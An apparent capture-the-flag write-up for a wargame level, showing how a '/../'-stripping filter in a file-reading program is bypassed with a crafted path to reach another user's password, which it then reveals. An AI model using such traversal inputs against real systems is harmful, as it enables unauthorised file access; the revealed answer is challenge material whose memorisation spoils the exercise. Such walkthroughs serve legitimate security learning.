This program allows you to read files from my shared files. See /usr/share/level5 for my shared files. Simply use the path relative to my shared files to read a file!
Example: ./shared lyrics/foreverautumn
Doing an ls of /usr/share/level5 displays:
drwxr-xr-x 2 root root 4096 2008-04-21 18:17 lyrics
-rw-r--r-- 1 root root 5 2008-01-12 21:10 shit1
-rw-r--r-- 1 root root 5 2008-01-12 21:10 shit2
-rw-r--r-- 1 root root 5 2008-01-12 21:10 shit3
-rw-r--r-- 1 root root 5 2008-01-12 21:10 shit4
-rw-r--r-- 1 root root 5 2008-01-12 21:10 shit5
And an ls -l of lyrics displays:
Running the example given: ./shared lyrics/foreverautumn prints out the contents of the file. This is interesting. The results of this makes me feel like there's a directory traversal bug here, so I quickly try to move up directories
level4@blackbox:~$ ./shared /usr/share/level5/lyrics/../shit1
Contents of /usr/share/level5/usr/share/level5/lyricsshit1:
Unable to open file
This is interesting. It says it's unable to open the file, and it completely removed the "/../" from my string. Time to crack open the source.
 |
| Filter in code |
level4@blackbox:~$ ./shared lyrics/./.././shit1
Contents of /usr/share/level5/lyrics/../shit1:
shit
Perfect! Now all we need to do is traverse to level5's home directory and read the password!
 |
| Directory Traversal |
SPOILER! Highlight below to view the password:
Traveller
